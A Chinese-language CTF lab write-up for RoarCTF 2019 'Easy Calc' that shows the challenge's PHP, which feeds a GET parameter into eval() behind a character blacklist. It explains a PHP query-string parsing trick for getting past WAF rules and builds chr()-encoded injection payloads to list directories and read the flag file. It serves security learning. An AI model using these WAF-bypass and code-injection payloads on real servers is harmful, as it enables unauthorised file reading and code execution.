练习 18 Web [RoarCTF 2019]Easy Calc

表达式注入，被屏蔽字符的处理方式

一开始先看一下前端的源码
有一个calc.php，肯定需要打开


这是calc中的代码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

到这里就卡住了，搜calc以及本题wp
是没做过的类型

[RoarCTF 2019]Easy Calc

RoarCTF 2019 Easy Calc 1【BUUCFT】【表达式注入】

表达式注入主要有以下几个要点：

常用的几个函数：
chr() — 返回指定的字符

scandir() — 列出指定路径中的文件和目录

var_dump() — 打印变量的相关信息

file_get_contents() — 将整个文件读入一个字符串

PHP字符串解析漏洞的理解：
我们知道PHP将查询字符串（在URL或正文中）转换为内部${}_{G}ET或的关联数组$_POST。
例如：/?foo=bar变成Array([foo] => “bar”)。
值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。
例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。
如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，
那么我们就可以用以下语句绕过：
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：
1.删除空白符
2.将某些字符转换为下划线（包括空格）

根据以上内容，尝试构建payload：
首先 肯定要打印
然后需要搜索目录 ,直接从根目录开始，所以是‘\’,但是从‘calc.php’知道‘\’已经被屏蔽了

查询ASCII码的对应表，可以用数字47转成字符
故用chr(47)代替，构造payload1

var_dump(scandir(chr(47)))；

返回值如下：

构造payload2
但是’/'已经被屏蔽了，所以改一下

var_dump( file_get_contents('/f1agg'))

#实测这种组合是不行的
var_dump( file_get_contents(chr(47)+'f1agg'))

#全部转换为chr()
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

附录：
var_dump($expression)
输出你需要输出的变量，包括变量的值和变量的类型
参数说明: 你要输出的变量。

#示例：
<?php
$a = array(1, 2, array("a", "b", "c"));
var_dump($a);
?>

#输出结果
array(3) {
  [0]=>
  int(1)
  [1]=>
  int(2)
  [2]=>
  array(3) {
    [0]=>
    string(1) "a"
    [1]=>
    string(1) "b"
    [2]=>
    string(1) "c"
  }
}